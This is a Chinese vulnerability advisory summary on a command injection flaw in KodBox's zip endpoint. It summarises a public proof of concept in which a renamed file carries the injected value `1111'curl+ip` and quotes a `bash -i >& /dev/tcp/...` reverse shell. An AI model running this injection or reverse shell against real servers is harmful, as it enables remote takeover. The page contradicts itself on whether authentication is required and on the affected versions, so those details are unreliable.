# KodBox zip 命令注入漏洞
## 概述
kalcaddle kodbox 在版本 1.61.10 及之前存在一个命令注入漏洞,位于组件压缩处理程序中对 `/explorer/index/zip` 接口的处理逻辑。
## 影响版本
kalcaddle kodbox ≤ 1.61.10
## 细节
漏洞存在于 `/explorer/index/zip` 接口的处理过程中,攻击者可通过特定方式操纵该接口的参数,触发命令注入。无需身份验证即可远程利用。
## 影响
攻击者可远程执行任意命令,完全控制受影响系统。该漏洞已有公开的利用工具,可被实际攻击使用。供应商已提前通知但未回应。
是否为 Web 类漏洞: 未知
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
标题: CV3/Krce.md at main · DReazer/CV3 · GitHub -- 🔗来源链接
标签:exploit
神龙速读:
### 关键漏洞信息
- **漏洞类型**: 远程命令执行 (Remote Command Execution, RCE)
- **影响版本**: 1.60.03 版本(1.60.03 release on linux)
- **漏洞存在于**: kodbox V1. 60
- **漏洞操作步骤**:
- 利用 Kodbox 的注册功能,注册一个普通账号并登录。
- 在 "My Files" 中上传一个文件。
- 通过重命名操作,将文件重命名为包含攻击向量的名字。
- 重命名后的文件名为 `1111'curl+ip`。
- 执行在线压缩,触发命令执行漏洞。
- **漏洞利用条件**:
- 具有上传文件和重命名文件的操作权限。
- 利用了压缩操作的时候,系统对文件名处理不当,导致命令执行。
- **攻击链演示**:
- 攻击方通过发送特制的文件名,触发命令执行。
- 通过实时监听,成功连接到被攻击方的服务器,执行了恶意代码逆向 Shell `bash -i >& /dev/tcp/101.132.*.*`.
### 总结
该漏洞主要存在于 Kodbox 的 1.60.03 版本中,通过利用特定文件名上传和在线压缩功能触发远程命令执行漏洞,攻击者可以获得服务器的控制权限。需注意,对此漏洞的修复应加强文件名检测、避免直接执行外部文件名宿主系统命令。
暂无评论